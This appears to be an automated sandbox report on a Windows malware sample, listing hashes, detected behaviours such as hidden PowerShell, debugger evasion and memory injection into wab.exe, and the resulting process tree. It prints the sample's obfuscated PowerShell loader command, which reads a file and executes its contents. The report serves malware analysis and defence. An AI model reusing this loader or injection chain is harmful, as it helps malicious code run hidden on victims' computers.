Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/09/2024, 10:48
Static task
static1
Behavioral task
behavioral1
Sample
7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe
Resource
win10v2004-20240802-en
General
-
Target
7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe
-
Size
530KB
-
MD5
7d411a34136e88e95d155a5cad1fdb5a
-
SHA1
9873390cb988aa07add91730944d717f4df32c68
-
SHA256
7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10
-
SHA512
3371b0fb4cd0332d3476f7083735552620179788091444c8f4cb17a03ee298b803d826ffa4b2383cbddf4b75a20570cc377210e427734e5c60b9c63ea686c8c6
-
SSDEEP
12288:W3dPSj0k1KImtsjw/oB/Y6kjjWgTg27K57ZszDXTVBC5/q:W3ddWjcofTg82Es3TzC5i
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3028 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3028 powershell.exe 2924 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3028 set thread context of 2924 3028 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2828 2924 WerFault.exe 34 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2508 wrote to memory of 3028 2508 7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe 30 PID 2508 wrote to memory of 3028 2508 7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe 30 PID 2508 wrote to memory of 3028 2508 7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe 30 PID 2508 wrote to memory of 3028 2508 7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe 30 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 3028 wrote to memory of 2924 3028 powershell.exe 34 PID 2924 wrote to memory of 2828 2924 wab.exe 35 PID 2924 wrote to memory of 2828 2924 wab.exe 35 PID 2924 wrote to memory of 2828 2924 wab.exe 35 PID 2924 wrote to memory of 2828 2924 wab.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe"C:\Users\Admin\AppData\Local\Temp\7d658e7d4fdce9ab237617fd28b784e73110be0bf9cfdeeabab1e897b9ae2c10.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Beflyvningens=Get-Content 'C:\Users\Admin\AppData\Local\Detenterne\Clistothecium.Kub';$stvningsvarslers=$Beflyvningens.SubString(52071,3);.$stvningsvarslers($Beflyvningens)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1244⤵
- Program crash
PID:2828
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD58a011580eb615d1188d53d7172459e29
SHA148e8d6b6c7c3aa9bb0fd9b1f4e063a169da7aa23
SHA256fe0001d86026df15c1bd60689fe8b35bf9e0871a3aa3423d93643fb6ce02e133
SHA51227085bddd4d1d9fcc0116b9ab1846628174c29d40191b9f884ff32f3a39cc8343f0e18796cfe842a06b56bae82191cbb096c3de13b142d21abb8cc5bf84f2aea
-
Filesize
338KB
MD50fa308be797fbe19198d485c4046a917
SHA15b8073846e431505cfcff5b43ac5e8e32aeaf7bb
SHA25614e6ef457f06dc8ca9913a3dcf53eb761e6188ac6e2b37bd83804805e663a186
SHA512378702b2f27bb1055028521598c0d74d841ff9ed00c058807edf8daae2d39e3481bd46966d8fd7f4b00befc17c9360a68eb152161f39ab0d612442f14801c4bd